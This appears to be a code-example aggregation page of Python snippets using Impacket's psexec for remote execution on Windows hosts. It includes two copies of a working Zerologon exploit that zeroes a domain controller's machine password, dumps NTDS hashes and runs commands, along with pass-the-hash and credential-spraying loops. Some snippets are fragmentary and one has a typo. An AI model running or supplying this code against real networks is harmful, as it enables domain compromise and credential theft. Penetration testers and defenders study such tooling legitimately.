コード例 #1
0
def run(cible, logger):
    """
    Le run() sera appelé pour chaque demande d'information au sujet d'une
    cible. Il recevra en arguments les resultats précédemment agrégés, sous
    forme d'un dictionnaire, et contenant notamment l'IP de la cible et son
    hostname, et le logger.

    La fonction retournera un objet SQLalchemy avec les attributs découverts.

    En cas d'exception, la consigner avec le logger approprié et retourner 1
    ou laisser remonter l'exception.
    """
    resultats = Result()
    # Recherche dans la base de SEPM
    logger.debug("Lancement de psexec...")
    psobject = psexec.PSEXEC("cmd.exe /c systeminfo",
                             "c:\\windows\\system32\\",
                             None,
                             "445/SMB",
                             username='******',
                             password='******')
    raw_result = psobject.run(cible["ip"])
    print raw_result
    psobject.kill()

    if True:
        logger.info('  IP présente dans la base de SEPM')
        resultats.presence = True
        resultats.os = "OS"
    else:
        resultats.presence = False
        logger.info('  IP inconnue dans SEPM')
    return resultats
コード例 #2
0
def ServePsexec(payloaddirectory, targethash, targetusername, targetdomain,
                targetipaddr, targetpassword):
    try:
        command = ''
        path = ''
        exeFile = payloaddirectory
        copyFile = ''
        PSEXEC = psexec.PSEXEC(command,
                               path,
                               exeFile,
                               copyFile,
                               protocols=None,
                               username=targetusername,
                               hashes=targethash,
                               domain=targetdomain,
                               password=targetpassword,
                               aesKey=None,
                               doKerberos=False)
        print t.bold_green + '\n [*] Starting Psexec....' + t.normal
        time.sleep(20)
        PSEXEC.run(targetipaddr)
    except Exception as E:
        print t.bold_red + '\n[*] Psexec Error!'
        print E
        print '\n[*] Psexec May Have Worked' + t.normal
コード例 #3
0
def StartPsexec(exeFile, targetusername, psexechash, targetdomain, psexecip):
    PSEXEC = psexec.PSEXEC(command="", path="", exeFile=exeFile, copyFile="", protocols=None, username=targetusername,
                           hashes=psexechash, domain=targetdomain, password='', aesKey=None, doKerberos=False)
    print t.bold_green + "\n[*] Starting Psexec...." + t.normal
    time.sleep(15)
    try:
        PSEXEC.run(psexecip)
    except SessionError:
        print t.bold_red + "[*] Clean Up Failed, Remove Manually with Shell"
コード例 #4
0
def perform_attack(dc_handle, dc_ip, target_computer, target_da="Administrator"):
  # Keep authenticating until succesfull. Expected average number of attempts needed: 256.
  print('Performing authentication attempts...')
  rpc_con = None
  for attempt in range(0, MAX_ATTEMPTS):
    rpc_con, serverChallenge = try_zero_authenticate(dc_handle, dc_ip, target_computer)


    if rpc_con == None:
        print('=', end='', flush=True)
    else:
        break
  if rpc_con:
    print('\nSuccess! DC can be fully compromised by a Zerologon attack.')
    plaintext = b'\x00' * 8
    sessionKey = nrpc.ComputeSessionKeyStrongKey('', plaintext, serverChallenge, None)
    ppp = nrpc.ComputeNetlogonCredential(plaintext, sessionKey)
    clientStoredCredential = pack('<Q', unpack('<Q', ppp)[0] + 10)
    CLP = nrpc.NL_TRUST_PASSWORD()
    CLP['Buffer'] = b'\x00' * 512
    CLP['Length'] = '\x00\x00\x00\x00'
    blah = nrpc.hNetrServerPasswordSet2(
        rpc_con, dc_handle + '\x00',
        target_computer + '$\x00', nrpc.NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel,
        target_computer + '\x00',
        update_authenticator(clientStoredCredential, sessionKey, 0), b'\x00' * 516
    )
    blah.dump()
    import secretsdump, psexec
    class SDOptions:
        def __init__(self):
            self.use_vss = False
            self.target_ip = dc_ip
            self.outputfile = './dumped.tmp'
            self.hashes = "aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0"
            self.exec_method = "smbexec"
            self.just_dc = True
            self.just_dc_ntlm = True
            self.just_dc_user = target_da
            self.pwd_last_set = self.user_status = self.resumefile = \
            self.k = self.history = self.ntds = self.sam = self.security = \
            self.system = self.aesKey = self.bootkey = None
            self.dc_ip = dc_ip
    class PSOptions:
        def __init__(self):
            self.help = False
    dump = secretsdump.DumpSecrets(dc_ip, target_computer+'$', '', '', SDOptions()).dump()
    f= open("dumped.tmp.ntds").read()
#    print(f)
    hashes = ':'.join(f.split(':')[2:-3])
    print(hashes)
    psexec = psexec.PSEXEC('powershell.exe -c Reset-ComputerMachinePassword', None, None, None, hashes=hashes, username=target_da, serviceName='f****d')
    psexec.run(dc_name, dc_ip)
  else:
    print('\nAttack failed. Target is probably patched.')
    sys.exit(1)
コード例 #5
0
 def process(self, ip):
     #Do stuff with the server here
     for user, auth in self.credentials:
         if self.verbose == 1:
             print self.colours.cstring(
                 "Attempting to auth with " + ip + " using Username: "******" And Auth: " + auth, "light_blue")
         if len(auth) == 65 and ':' in auth:
             psobject = psexec.PSEXEC(self.com,
                                      self.path,
                                      "445/SMB",
                                      username=user,
                                      hashes=auth)
         else:
             psobject = psexec.PSEXEC(self.com,
                                      self.path,
                                      "445/SMB",
                                      username=user,
                                      password=auth)
         try:
             psobject.run(ip)
         except:
             continue
コード例 #6
0
ファイル: zer0dump.py プロジェクト: theologu/zer0dump
def perform_attack(options):
    # Keep authenticating until succesfull. Expected average number of attempts needed: 256.
    print('Performing authentication attempts...')
    rpc_con = None
    conn = SMBConnection(options.target, options.target, None, options.port)
    conn.login('', '')
    dc_handle = f"\\\\{conn.getServerName()}"
    target_computer = conn.getServerName()
    dc_ip = options.target

    print(dc_ip)
    print(target_computer)
    for attempt in range(0, MAX_ATTEMPTS):
        rpc_con, serverChallenge = try_zero_authenticate(
            dc_handle, dc_ip, target_computer)
        if rpc_con == None:
            print('=', end='', flush=True)
        else:
            break
    if rpc_con:
        print('\nSuccess! DC can be fully compromised by a Zerologon attack.')
        plaintext = b'\x00' * 8
        sessionKey = nrpc.ComputeSessionKeyStrongKey('', plaintext,
                                                     serverChallenge, None)
        ppp = nrpc.ComputeNetlogonCredential(plaintext, sessionKey)
        clientStoredCredential = pack('<Q', unpack('<Q', ppp)[0] + 10)
        print()
        blah = nrpc.hNetrServerPasswordSet2(
            rpc_con, dc_handle + '\x00', target_computer + '$\x00',
            nrpc.NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel,
            target_computer + '\x00',
            update_authenticator(clientStoredCredential, sessionKey,
                                 0), b'\x00' * 516)
        blah.dump()
        #    stringbinding = epm.hept_map(options.target, lsat.MSRPC_UUID_LSAT, protocol="ncacn_ip_tcp")
        #    rpc_con = transport.DCERPCTransportFactory(stringbinding).get_dce_rpc()
        #    rpc_con.connect()
        #    rpc_con.bind(lsat.MSRPC_UUID_LSAT)
        #    resp = lsad.hLsarOpenPolicy2(rpc_con, MAXIMUM_ALLOWED | lsat.POLICY_LOOKUP_NAMES)
        #    sid = lsad.hLsarQueryInformationPolicy2(rpc_con, resp['PolicyHandle'], lsad.POLICY_INFORMATION_CLASS.PolicyAccountDomainInformation)['PolicyInformation']['PolicyPrimaryDomainInfo']['Sid'].formatCanonical()
        #    print(sid)
        if options.silver:
            exit()
        import secretsdump, psexec

        class SDOptions:
            def __init__(self):
                self.use_vss = False
                self.target_ip = dc_ip
                self.outputfile = './dumped.tmp'
                self.hashes = "aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0"
                self.exec_method = "smbexec"
                self.just_dc = True
                self.just_dc_ntlm = True
                self.just_dc_user = options.target_da
                self.pwd_last_set = self.user_status = self.resumefile = \
                self.k = self.history = self.ntds = self.sam = self.security = \
                self.system = self.aesKey = self.bootkey = None
                self.dc_ip = dc_ip

        class PSOptions:
            def __init__(self):
                self.help = Falses


#    h = SMBConnection(options.target, options.target, None, options.port)
#    if options.target_machine:
#        h.login(options.target_machine + "$", '')
#    else:
#        h.login(target_computer + '$', '')

        secretsdump.DumpSecrets(dc_ip, target_computer + '$', '', '',
                                SDOptions()).dump()

        f = open("dumped.tmp.ntds").read()
        #    print(f)
        hashes = ':'.join(f.split(':')[2:-3])
        print(hashes)
        psexec = psexec.PSEXEC(
            'powershell.exe -c Reset-ComputerMachinePassword',
            None,
            None,
            None,
            hashes=hashes,
            username=options.target_da,
            serviceName='f****d')
        psexec.run(options.target, dc_ip)
    else:
        print('\nAttack failed. Target is probably patched.')
        sys.exit(1)
コード例 #7
0
             print("[*] Starting web server on port %s in %s") % (
                 str(src_port), str(cwd))
         if hash:
             print(
                 "[*] Attempting to access the system %s with, user: %s hash: %s domain: %s "
             ) % (dst, usr, hash, dom)
         else:
             print(
                 "[*] Attempting to access the system %s with, user: %s pwd: %s domain: %s "
             ) % (dst, usr, pwd, dom)
         attack = psexec.PSEXEC(command,
                                path=directory,
                                protocols=protocol,
                                username=usr,
                                password=pwd,
                                domain=dom,
                                hashes=hash,
                                copyFile=None,
                                exeFile=None,
                                aesKey=aes,
                                doKerberos=kerberos)
         attack.run(dst)
         if attacks:
             srv.terminate()
             print("[*] Shutting down the catapult web server")
 elif wmiexec_cmd:
     for dst in final_targets:
         if attacks:
             srv = http_server(src_port, cwd)
             print("[*] Starting web server on port %s in %s") % (
                 str(src_port), str(cwd))
コード例 #8
0
# this script should be used with impacket
# python psexec.py admin:[email protected] cmd -path c:\\windows\\system32\\

import psexec

ip = "10.10.10.10"
username = "******"
#password=""
hashes = "adasdasdasdasd:dahjkdhasksjhdsa"

#pass the hash technique
psobject = psexec.PSEXEC("cmd.exe",
                         "c:\\windows\\system32\\",
                         "445/SMB",
                         username=username,
                         hashes=hashes)
#psobject = psexec.PSEXEC("cmd.exe", "c:\\windows\\system32\\", "445/SMB", username=username, password=password)
psobject.run(ip)